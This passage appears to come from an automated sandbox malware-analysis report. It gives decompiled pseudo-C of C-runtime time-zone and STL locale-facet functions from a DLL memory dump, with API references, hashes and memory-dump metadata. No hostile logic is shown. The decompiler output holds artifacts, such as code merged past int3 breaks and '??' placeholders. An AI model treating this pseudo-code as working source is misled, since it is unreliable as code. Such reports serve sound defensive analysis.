					 *0x6de95378 =  *0x6de95378 | 0xffffffff;
					_push(0);
					_push(_t96);
					_t90 = 0;
					 *0x6de97a10 = 0;
					_t42 = E6DE21216(0x6de42130, _t87, 0, __eflags,  &_v316,  &_v312, 0x100, 0x6de42130);
					__eflags = _t42;
					if(_t42 != 0) {
						__eflags = _t42 - 0x22;
						if(_t42 == 0x22) {
							_t101 = E6DE1F26D(_t78, _v272);
							__eflags = _t101;
							if(__eflags != 0) {
								_t50 = E6DE21216(0x6de42130, _t87, 0, __eflags,  &_v276, _t101, _v272, 0x6de42130);
								__eflags = _t50;
								if(_t50 == 0) {
									E6DE1CBD3(0);
									_t90 = _t101;
								} else {
									_push(_t101);
									goto L26;
								}
							} else {
								_push(0);
								L26:
								E6DE1CBD3();
							}
						}
					} else {
						_t90 =  &_v268;
					}
					asm("sbb esi, esi");
					_t100 =  ~(_t90 -  &_v268) & _t90;
					__eflags = _t90;
					if(__eflags == 0) {
						L34:
						E6DE28951(0x6de42130, _t90, __eflags);
					} else {
						__eflags =  *_t90;
						if(__eflags == 0) {
							goto L34;
						} else {
							_push(_t90);
							E6DE2877C(0x6de42130, _t90, __eflags);
						}
					}
					E6DE1CBD3(_t100);
					__eflags = _v12 ^ _t106;
					return E6DDEF8A5(_v12 ^ _t106, _t87, _t100);
				} else {
					_t54 = E6DE28231( &_v12);
					_pop(_t78);
					if(_t54 != 0) {
						goto L19;
					} else {
						_t56 = E6DE2825D( &_v16);
						_pop(_t78);
						if(_t56 != 0) {
							goto L19;
						} else {
							E6DE1CBD3( *0x6de97a08);
							 *0x6de97a08 = 0;
							 *_t107 = 0x6de97a18;
							if(GetTimeZoneInformation(??) != 0xffffffff) {
								_t85 =  *0x6de97a18 * 0x3c;
								_t88 =  *0x6de97a6c; // 0x0
								_push(__edi);
								 *0x6de97a10 = 1;
								_v8 = _t85;
								_t116 =  *0x6de97a5e; // 0x0
								if(_t116 != 0) {
									_v8 = _t85 + _t88 * 0x3c;
								}
								_t118 =  *0x6de97ab2; // 0x0
								if(_t118 == 0) {
									L9:
									_v12 = 0;
									_v16 = 0;
								} else {
									_t71 =  *0x6de97ac0; // 0x0
									if(_t71 == 0) {
										goto L9;
									} else {
										_v12 = 1;
										_v16 = (_t71 - _t88) * 0x3c;
									}
								}
								_t94 = E6DE13CD0(0, _t88);
								if(WideCharToMultiByte(_t94, 0, 0x6de97a1c, 0xffffffff,  *_t96, 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
									 *( *_t96) = 0;
								} else {
									( *_t96)[0x3f] = 0;
								}
								if(WideCharToMultiByte(_t94, 0, 0x6de97a70, 0xffffffff, _t96[1], 0x3f, 0,  &_v20) == 0 || _v20 != 0) {
									 *(_t96[1]) = 0;
								} else {
									_t96[1][0x3f] = 0;
								}
							}
							 *(E6DE28225()) = _v8;
							 *(E6DE28219()) = _v12;
							_t61 = E6DE2821F();
							 *_t61 = _v16;
							return _t61;
						}
					}
				}
			}

APIs

GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,6DE42130), ref: 6DE289BB
WideCharToMultiByte.KERNEL32(00000000,00000000,6DE97A1C,000000FF,00000000,0000003F,00000000,?,?), ref: 6DE28A33
WideCharToMultiByte.KERNEL32(00000000,00000000,6DE97A70,000000FF,?,0000003F,00000000,?), ref: 6DE28A60
_free.LIBCMT ref: 6DE289A9

Part of subcall function 6DE1CBD3: HeapFree.KERNEL32(00000000,00000000,?,6DE2CFAF,00000000,00000000,00000000,00000000,?,6DE2D2B4,00000000,00000007,00000000,?,6DE2C0FC,00000000), ref: 6DE1CBE9
Part of subcall function 6DE1CBD3: GetLastError.KERNEL32(00000000,?,6DE2CFAF,00000000,00000000,00000000,00000000,?,6DE2D2B4,00000000,00000007,00000000,?,6DE2C0FC,00000000,00000000), ref: 6DE1CBFB

_free.LIBCMT ref: 6DE28B75

Strings

0!m, xrefs: 6DE28964, 6DE2896A
0!m, xrefs: 6DE28AD8

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: ByteCharMultiWide_free$ErrorFreeHeapInformationLastTimeZone
String ID: 0!m$0!m
API String ID: 1286116820-1395855498
Opcode ID: 83393200c7e2b17309fb69254005481ce6415da97b2b8e57cb5ec7cd730e1b94
Instruction ID: e68977eb1193c54e642464f88e366187d46331ea82504d62cf11590a73edc188
Opcode Fuzzy Hash: 83393200c7e2b17309fb69254005481ce6415da97b2b8e57cb5ec7cd730e1b94
Instruction Fuzzy Hash: F851C9B2D05619EFDB10DF698CC09BEB7B8EB41318B31466ED554A7240EF709A458BA0

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDFC89, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E6DDDFC89(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t27;
				intOrPtr* _t28;
				intOrPtr* _t55;
				intOrPtr* _t63;
				intOrPtr* _t64;
				void* _t66;

				_t48 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t66 - 0x14, 0);
				_t63 =  *0x6de96dd0; // 0x0
				 *(_t66 - 4) =  *(_t66 - 4) & 0x00000000;
				 *((intOrPtr*)(_t66 - 0x10)) = _t63;
				_t27 = E6DDB161C(0x6de96d60);
				_t51 =  *((intOrPtr*)(_t66 + 8));
				_t28 = E6DDB171B( *((intOrPtr*)(_t66 + 8)), _t27);
				_t61 = _t28;
				if(_t28 != 0) {
					L5:
					E6DDD66BA(_t66 - 0x14);
					return E6DDF0075(_t61);
				} else {
					if(_t63 == 0) {
						_push( *((intOrPtr*)(_t66 + 8)));
						_push(_t66 - 0x10);
						__eflags = E6DDE162A(__ebx, _t51, __edx, _t61, _t63) - 0xffffffff;
						if(__eflags == 0) {
							_t55 = _t66 - 0x20;
							E6DDB1438(_t55);
							E6DDF3D74(_t66 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de3851f, __ebx, _t61, _t63, 4);
							_t64 = _t55;
							 *((intOrPtr*)(_t66 - 0x10)) = _t64;
							 *((intOrPtr*)(_t64 + 4)) =  *((intOrPtr*)(_t66 + 0xc));
							_push( *((intOrPtr*)(_t66 + 0x14)));
							_t21 = _t66 - 4;
							 *_t21 =  *(_t66 - 4) & 0x00000000;
							__eflags =  *_t21;
							 *_t64 = 0x6de3c0c4;
							 *((char*)(_t64 + 0x28)) =  *((intOrPtr*)(_t66 + 0x10));
							E6DDE542F(_t48, _t55, __edx, _t61, _t64,  *_t21);
							return E6DDF0075(_t64,  *((intOrPtr*)(_t66 + 8)));
						} else {
							_t61 =  *((intOrPtr*)(_t66 - 0x10));
							 *((intOrPtr*)(_t66 - 0x10)) = _t61;
							 *(_t66 - 4) = 1;
							E6DDD6FD3(__eflags, _t61);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t61 + 4))))();
							 *0x6de96dd0 = _t61;
							goto L5;
						}
					} else {
						_t61 = _t63;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6DDDFC90
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDFC9A
int.LIBCPMT ref: 6DDDFCB1

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

std::_Facet_Register.LIBCPMT ref: 6DDDFCEB
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDFD0B
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDFD29

Strings

`mm, xrefs: 6DDDFCA5

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID: `mm
API String ID: 651022567-4209129558
Opcode ID: 2cceb0a9538ba9447dff87cbc2bac6eac88d65ee1656fe6f8f8b1f69899d2d58
Instruction ID: 28fe5fdf78197cc18ebc6580fc01403bc14ae7d8aa53fd79641eb367f98ebf02
Opcode Fuzzy Hash: 2cceb0a9538ba9447dff87cbc2bac6eac88d65ee1656fe6f8f8b1f69899d2d58
Instruction Fuzzy Hash: 7211C275948229DBCF01FB64C840AFDB775AF84318F264409F521AB290DF749A01CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDDF8A5, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 73%

			E6DDDF8A5(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t111;
				signed int _t112;
				void* _t124;
				void* _t137;
				void* _t150;
				void* _t163;
				void* _t176;
				void* _t189;
				signed int _t283;
				signed int _t308;
				signed int _t309;
				signed int _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				signed int _t315;
				signed int _t316;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int _t322;
				void* _t330;

				_t305 = __edx;
				_t234 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t330 - 0x14, 0);
				_t315 =  *0x6de96db0; // 0x0
				 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
				 *(_t330 - 0x10) = _t315;
				_t111 = E6DDB161C(0x6de96d64);
				_t237 =  *((intOrPtr*)(_t330 + 8));
				_t112 = E6DDB171B( *((intOrPtr*)(_t330 + 8)), _t111);
				_t307 = _t112;
				if(_t112 != 0) {
					L5:
					E6DDD66BA(_t330 - 0x14);
					return E6DDF0075(_t307);
				} else {
					if(_t315 == 0) {
						_push( *((intOrPtr*)(_t330 + 8)));
						_push(_t330 - 0x10);
						__eflags = E6DDE13A1(__ebx, _t237, __edx, _t307, _t315) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438(_t330 - 0x20);
							E6DDF3D74(_t330 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de383cf, __ebx, _t307, _t315, 0x14);
							E6DDD6653(_t330 - 0x14, 0);
							_t316 =  *0x6de96ddc; // 0x0
							 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
							 *(_t330 - 0x10) = _t316;
							_t124 = E6DDB161C(0x6de96d88);
							_t244 =  *((intOrPtr*)(_t330 + 8));
							_t308 = E6DDB171B( *((intOrPtr*)(_t330 + 8)), _t124);
							__eflags = _t308;
							if(_t308 != 0) {
								L12:
								E6DDD66BA(_t330 - 0x14);
								return E6DDF0075(_t308);
							} else {
								__eflags = _t316;
								if(_t316 == 0) {
									_push( *((intOrPtr*)(_t330 + 8)));
									_push(_t330 - 0x10);
									__eflags = E6DDE1409(_t234, _t244, __edx, _t308, _t316) - 0xffffffff;
									if(__eflags == 0) {
										E6DDB1438(_t330 - 0x20);
										E6DDF3D74(_t330 - 0x20, 0x6de93504);
										asm("int3");
										E6DDF00AC(0x6de383cf, _t234, _t308, _t316, 0x14);
										E6DDD6653(_t330 - 0x14, 0);
										_t317 =  *0x6de96de0; // 0x0
										 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
										 *(_t330 - 0x10) = _t317;
										_t137 = E6DDB161C(0x6de96d8c);
										_t251 =  *((intOrPtr*)(_t330 + 8));
										_t309 = E6DDB171B( *((intOrPtr*)(_t330 + 8)), _t137);
										__eflags = _t309;
										if(_t309 != 0) {
											L19:
											E6DDD66BA(_t330 - 0x14);
											return E6DDF0075(_t309);
										} else {
											__eflags = _t317;
											if(_t317 == 0) {
												_push( *((intOrPtr*)(_t330 + 8)));
												_push(_t330 - 0x10);
												__eflags = E6DDE1471(_t234, _t251, __edx, _t309, _t317) - 0xffffffff;
												if(__eflags == 0) {
													E6DDB1438(_t330 - 0x20);
													E6DDF3D74(_t330 - 0x20, 0x6de93504);
													asm("int3");
													E6DDF00AC(0x6de383cf, _t234, _t309, _t317, 0x14);
													E6DDD6653(_t330 - 0x14, 0);
													_t318 =  *0x6de96dfc; // 0x0
													 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
													 *(_t330 - 0x10) = _t318;
													_t150 = E6DDB161C(0x6de96da8);
													_t258 =  *((intOrPtr*)(_t330 + 8));
													_t310 = E6DDB171B( *((intOrPtr*)(_t330 + 8)), _t150);
													__eflags = _t310;
													if(_t310 != 0) {
														L26:
														E6DDD66BA(_t330 - 0x14);
														return E6DDF0075(_t310);
													} else {
														__eflags = _t318;
														if(_t318 == 0) {
															_push( *((intOrPtr*)(_t330 + 8)));
															_push(_t330 - 0x10);
															__eflags = E6DDE14EC(_t234, _t258, _t305, _t310, _t318) - 0xffffffff;
															if(__eflags == 0) {
																E6DDB1438(_t330 - 0x20);
																E6DDF3D74(_t330 - 0x20, 0x6de93504);
																asm("int3");
																E6DDF00AC(0x6de383cf, _t234, _t310, _t318, 0x14);
																E6DDD6653(_t330 - 0x14, 0);
																_t319 =  *0x6de96dcc; // 0x0
																 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																 *(_t330 - 0x10) = _t319;
																_t163 = E6DDB161C(0x6de96d80);
																_t265 =  *((intOrPtr*)(_t330 + 8));
																_t311 = E6DDB171B( *((intOrPtr*)(_t330 + 8)), _t163);
																__eflags = _t311;
																if(_t311 != 0) {
																	L33:
																	E6DDD66BA(_t330 - 0x14);
																	return E6DDF0075(_t311);
																} else {
																	__eflags = _t319;
																	if(_t319 == 0) {
																		_push( *((intOrPtr*)(_t330 + 8)));
																		_push(_t330 - 0x10);
																		__eflags = E6DDE1558(_t234, _t265, _t305, _t311, _t319) - 0xffffffff;
																		if(__eflags == 0) {
																			E6DDB1438(_t330 - 0x20);
																			E6DDF3D74(_t330 - 0x20, 0x6de93504);
																			asm("int3");
																			E6DDF00AC(0x6de383cf, _t234, _t311, _t319, 0x14);
																			E6DDD6653(_t330 - 0x14, 0);
																			_t320 =  *0x6de96e00; // 0x0
																			 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																			 *(_t330 - 0x10) = _t320;
																			_t176 = E6DDB161C(0x6de96dac);
																			_t272 =  *((intOrPtr*)(_t330 + 8));
																			_t312 = E6DDB171B( *((intOrPtr*)(_t330 + 8)), _t176);
																			__eflags = _t312;
																			if(_t312 != 0) {
																				L40:
																				E6DDD66BA(_t330 - 0x14);
																				return E6DDF0075(_t312);
																			} else {
																				__eflags = _t320;
																				if(_t320 == 0) {
																					_push( *((intOrPtr*)(_t330 + 8)));
																					_push(_t330 - 0x10);
																					__eflags = E6DDE15C4(_t234, _t272, _t305, _t312, _t320) - 0xffffffff;
																					if(__eflags == 0) {
																						E6DDB1438(_t330 - 0x20);
																						E6DDF3D74(_t330 - 0x20, 0x6de93504);
																						asm("int3");
																						E6DDF00AC(0x6de383cf, _t234, _t312, _t320, 0x14);
																						E6DDD6653(_t330 - 0x14, 0);
																						_t321 =  *0x6de96dd0; // 0x0
																						 *(_t330 - 4) =  *(_t330 - 4) & 0x00000000;
																						 *(_t330 - 0x10) = _t321;
																						_t189 = E6DDB161C(0x6de96d60);
																						_t279 =  *((intOrPtr*)(_t330 + 8));
																						_t313 = E6DDB171B( *((intOrPtr*)(_t330 + 8)), _t189);
																						__eflags = _t313;
																						if(_t313 != 0) {
																							L47:
																							E6DDD66BA(_t330 - 0x14);
																							return E6DDF0075(_t313);
																						} else {
																							__eflags = _t321;
																							if(_t321 == 0) {
																								_push( *((intOrPtr*)(_t330 + 8)));
																								_push(_t330 - 0x10);
																								__eflags = E6DDE162A(_t234, _t279, _t305, _t313, _t321) - 0xffffffff;
																								if(__eflags == 0) {
																									_t283 = _t330 - 0x20;
																									E6DDB1438(_t283);
																									E6DDF3D74(_t330 - 0x20, 0x6de93504);
																									asm("int3");
																									E6DDF00AC(0x6de3851f, _t234, _t313, _t321, 4);
																									_t322 = _t283;
																									 *(_t330 - 0x10) = _t322;
																									 *((intOrPtr*)(_t322 + 4)) =  *((intOrPtr*)(_t330 + 0xc));
																									_push( *((intOrPtr*)(_t330 + 0x14)));
																									_t105 = _t330 - 4;
																									 *_t105 =  *(_t330 - 4) & 0x00000000;
																									__eflags =  *_t105;
																									 *_t322 = 0x6de3c0c4;
																									 *((char*)(_t322 + 0x28)) =  *((intOrPtr*)(_t330 + 0x10));
																									E6DDE542F(_t234, _t283, _t305, _t313, _t322,  *_t105);
																									return E6DDF0075(_t322,  *((intOrPtr*)(_t330 + 8)));
																								} else {
																									_t313 =  *(_t330 - 0x10);
																									 *(_t330 - 0x10) = _t313;
																									 *(_t330 - 4) = 1;
																									E6DDD6FD3(__eflags, _t313);
																									 *0x6de3a26c();
																									 *((intOrPtr*)( *((intOrPtr*)( *_t313 + 4))))();
																									 *0x6de96dd0 = _t313;
																									goto L47;
																								}
																							} else {
																								_t313 = _t321;
																								goto L47;
																							}
																						}
																					} else {
																						_t312 =  *(_t330 - 0x10);
																						 *(_t330 - 0x10) = _t312;
																						 *(_t330 - 4) = 1;
																						E6DDD6FD3(__eflags, _t312);
																						 *0x6de3a26c();
																						 *((intOrPtr*)( *((intOrPtr*)( *_t312 + 4))))();
																						 *0x6de96e00 = _t312;
																						goto L40;
																					}
																				} else {
																					_t312 = _t320;
																					goto L40;
																				}
																			}
																		} else {
																			_t311 =  *(_t330 - 0x10);
																			 *(_t330 - 0x10) = _t311;
																			 *(_t330 - 4) = 1;
																			E6DDD6FD3(__eflags, _t311);
																			 *0x6de3a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t311 + 4))))();
																			 *0x6de96dcc = _t311;
																			goto L33;
																		}
																	} else {
																		_t311 = _t319;
																		goto L33;
																	}
																}
															} else {
																_t310 =  *(_t330 - 0x10);
																 *(_t330 - 0x10) = _t310;
																 *(_t330 - 4) = 1;
																E6DDD6FD3(__eflags, _t310);
																 *0x6de3a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t310 + 4))))();
																 *0x6de96dfc = _t310;
																goto L26;
															}
														} else {
															_t310 = _t318;
															goto L26;
														}
													}
												} else {
													_t309 =  *(_t330 - 0x10);
													 *(_t330 - 0x10) = _t309;
													 *(_t330 - 4) = 1;
													E6DDD6FD3(__eflags, _t309);
													 *0x6de3a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t309 + 4))))();
													 *0x6de96de0 = _t309;
													goto L19;
												}
											} else {
												_t309 = _t317;
												goto L19;
											}
										}
									} else {
										_t308 =  *(_t330 - 0x10);
										 *(_t330 - 0x10) = _t308;
										 *(_t330 - 4) = 1;
										E6DDD6FD3(__eflags, _t308);
										 *0x6de3a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t308 + 4))))();
										 *0x6de96ddc = _t308;
										goto L12;
									}
								} else {
									_t308 = _t316;
									goto L12;
								}
							}
						} else {
							_t307 =  *(_t330 - 0x10);
							 *(_t330 - 0x10) = _t307;
							 *(_t330 - 4) = 1;
							E6DDD6FD3(__eflags, _t307);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t307 + 4))))();
							 *0x6de96db0 = _t307;
							goto L5;
						}
					} else {
						_t307 = _t315;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6DDDF8AC
std::_Lockit::_Lockit.LIBCPMT ref: 6DDDF8B6
int.LIBCPMT ref: 6DDDF8CD

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

std::_Facet_Register.LIBCPMT ref: 6DDDF907
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDDF927
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDDF945

Strings

dmm, xrefs: 6DDDF8C1

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID: dmm
API String ID: 651022567-1634957888
Opcode ID: e3b836a6e0c97522e5b75a01cc3cacea4835bc8028bd3a64f6f914b17322833b
Instruction ID: 622732482d85de6770702ea4bad8aeaa75381fd61cdaeee2055d166b622c6fe9
Opcode Fuzzy Hash: e3b836a6e0c97522e5b75a01cc3cacea4835bc8028bd3a64f6f914b17322833b
Instruction Fuzzy Hash: 7111A075D08559DBCF05FBA4C840AFDB7B4AF44318F260009F611AB291DF749A02CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDEBBD6, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E6DDEBBD6(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t27;
				intOrPtr* _t28;
				intOrPtr* _t55;
				intOrPtr* _t63;
				intOrPtr* _t64;
				void* _t66;

				_t48 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t66 - 0x14, 0);
				_t63 =  *0x6de96e44; // 0x0
				 *(_t66 - 4) =  *(_t66 - 4) & 0x00000000;
				 *((intOrPtr*)(_t66 - 0x10)) = _t63;
				_t27 = E6DDB161C(0x6de96e24);
				_t51 =  *((intOrPtr*)(_t66 + 8));
				_t28 = E6DDB171B( *((intOrPtr*)(_t66 + 8)), _t27);
				_t61 = _t28;
				if(_t28 != 0) {
					L5:
					E6DDD66BA(_t66 - 0x14);
					return E6DDF0075(_t61);
				} else {
					if(_t63 == 0) {
						_push( *((intOrPtr*)(_t66 + 8)));
						_push(_t66 - 0x10);
						__eflags = E6DDEC295(__ebx, _t51, __edx, _t61, _t63) - 0xffffffff;
						if(__eflags == 0) {
							_t55 = _t66 - 0x20;
							E6DDB1438(_t55);
							E6DDF3D74(_t66 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de3851f, __ebx, _t61, _t63, 4);
							_t64 = _t55;
							 *((intOrPtr*)(_t66 - 0x10)) = _t64;
							 *((intOrPtr*)(_t64 + 4)) =  *((intOrPtr*)(_t66 + 0xc));
							_push( *((intOrPtr*)(_t66 + 0x14)));
							_t21 = _t66 - 4;
							 *_t21 =  *(_t66 - 4) & 0x00000000;
							__eflags =  *_t21;
							 *_t64 = 0x6de3c414;
							 *((char*)(_t64 + 0x28)) =  *((intOrPtr*)(_t66 + 0x10));
							E6DDED028(_t48, _t55, __edx, _t61, _t64,  *_t21);
							return E6DDF0075(_t64,  *((intOrPtr*)(_t66 + 8)));
						} else {
							_t61 =  *((intOrPtr*)(_t66 - 0x10));
							 *((intOrPtr*)(_t66 - 0x10)) = _t61;
							 *(_t66 - 4) = 1;
							E6DDD6FD3(__eflags, _t61);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t61 + 4))))();
							 *0x6de96e44 = _t61;
							goto L5;
						}
					} else {
						_t61 = _t63;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6DDEBBDD
std::_Lockit::_Lockit.LIBCPMT ref: 6DDEBBE7
int.LIBCPMT ref: 6DDEBBFE

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

std::_Facet_Register.LIBCPMT ref: 6DDEBC38
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDEBC58
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDEBC76

Strings

$nm, xrefs: 6DDEBBF2

Memory Dump Source

Source File: 00000002.00000002.591627412.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000002.00000002.590655909.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.610940867.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.620714092.000000006DE95000.00000004.00020000.sdmp Download File

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrow
String ID: $nm
API String ID: 651022567-696978172
Opcode ID: 8168f91ac38629fe5db1247079f4a67409b5bdd8fba0330f09cba5b119c02ed2
Instruction ID: 4cdc068e590627b12180cbe415b8556feb5e3cbb72a92fb4c0172b24f6db1385
Opcode Fuzzy Hash: 8168f91ac38629fe5db1247079f4a67409b5bdd8fba0330f09cba5b119c02ed2
Instruction Fuzzy Hash: 7F11A075909219DBCF01FBA4C840BBDB7B5AF44718F270009F611AB290DF74AA01CBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDEBB30, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E6DDEBB30(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t41;
				signed int _t42;
				void* _t54;
				signed int _t93;
				signed int _t103;
				signed int _t105;
				signed int _t106;
				signed int _t107;
				void* _t110;

				_t79 = __ebx;
				E6DDF00AC(0x6de383cf, __ebx, __edi, __esi, 0x14);
				E6DDD6653(_t110 - 0x14, 0);
				_t105 =  *0x6de96e40; // 0x0
				 *(_t110 - 4) =  *(_t110 - 4) & 0x00000000;
				 *(_t110 - 0x10) = _t105;
				_t41 = E6DDB161C(0x6de96e20);
				_t82 =  *((intOrPtr*)(_t110 + 8));
				_t42 = E6DDB171B( *((intOrPtr*)(_t110 + 8)), _t41);
				_t102 = _t42;
				if(_t42 != 0) {
					L5:
					E6DDD66BA(_t110 - 0x14);
					return E6DDF0075(_t102);
				} else {
					if(_t105 == 0) {
						_push( *((intOrPtr*)(_t110 + 8)));
						_push(_t110 - 0x10);
						__eflags = E6DDEC229(__ebx, _t82, __edx, _t102, _t105) - 0xffffffff;
						if(__eflags == 0) {
							E6DDB1438(_t110 - 0x20);
							E6DDF3D74(_t110 - 0x20, 0x6de93504);
							asm("int3");
							E6DDF00AC(0x6de383cf, __ebx, _t102, _t105, 0x14);
							E6DDD6653(_t110 - 0x14, 0);
							_t106 =  *0x6de96e44; // 0x0
							 *(_t110 - 4) =  *(_t110 - 4) & 0x00000000;
							 *(_t110 - 0x10) = _t106;
							_t54 = E6DDB161C(0x6de96e24);
							_t89 =  *((intOrPtr*)(_t110 + 8));
							_t103 = E6DDB171B( *((intOrPtr*)(_t110 + 8)), _t54);
							__eflags = _t103;
							if(_t103 != 0) {
								L12:
								E6DDD66BA(_t110 - 0x14);
								return E6DDF0075(_t103);
							} else {
								__eflags = _t106;
								if(_t106 == 0) {
									_push( *((intOrPtr*)(_t110 + 8)));
									_push(_t110 - 0x10);
									__eflags = E6DDEC295(__ebx, _t89, __edx, _t103, _t106) - 0xffffffff;
									if(__eflags == 0) {
										_t93 = _t110 - 0x20;
										E6DDB1438(_t93);
										E6DDF3D74(_t110 - 0x20, 0x6de93504);
										asm("int3");
										E6DDF00AC(0x6de3851f, _t79, _t103, _t106, 4);
										_t107 = _t93;
										 *(_t110 - 0x10) = _t107;
										 *((intOrPtr*)(_t107 + 4)) =  *((intOrPtr*)(_t110 + 0xc));
										_push( *((intOrPtr*)(_t110 + 0x14)));
										_t35 = _t110 - 4;
										 *_t35 =  *(_t110 - 4) & 0x00000000;
										__eflags =  *_t35;
										 *_t107 = 0x6de3c414;
										 *((char*)(_t107 + 0x28)) =  *((intOrPtr*)(_t110 + 0x10));
										E6DDED028(_t79, _t93, __edx, _t103, _t107,  *_t35);
										return E6DDF0075(_t107,  *((intOrPtr*)(_t110 + 8)));
									} else {
										_t103 =  *(_t110 - 0x10);
										 *(_t110 - 0x10) = _t103;
										 *(_t110 - 4) = 1;
										E6DDD6FD3(__eflags, _t103);
										 *0x6de3a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t103 + 4))))();
										 *0x6de96e44 = _t103;
										goto L12;
									}
								} else {
									_t103 = _t106;
									goto L12;
								}
							}
						} else {
							_t102 =  *(_t110 - 0x10);
							 *(_t110 - 0x10) = _t102;
							 *(_t110 - 4) = 1;
							E6DDD6FD3(__eflags, _t102);
							 *0x6de3a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t102 + 4))))();
							 *0x6de96e40 = _t102;
							goto L5;
						}
					} else {
						_t102 = _t105;
						goto L5;
					}
				}
			}

APIs

__EH_prolog3.LIBCMT ref: 6DDEBB37
std::_Lockit::_Lockit.LIBCPMT ref: 6DDEBB41
int.LIBCPMT ref: 6DDEBB58

Part of subcall function 6DDB161C: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB162D
Part of subcall function 6DDB161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1647

std::_Facet_Register.LIBCPMT ref: 6DDEBB92
std::_Lockit::~_Lockit.LIBCPMT ref: 6DDEBBB2
__CxxThrowException@8.LIBVCRUNTIME ref: 6DDEBBD0

Strings

nm, xrefs: 6DDEBB4C

Memory Dump Source

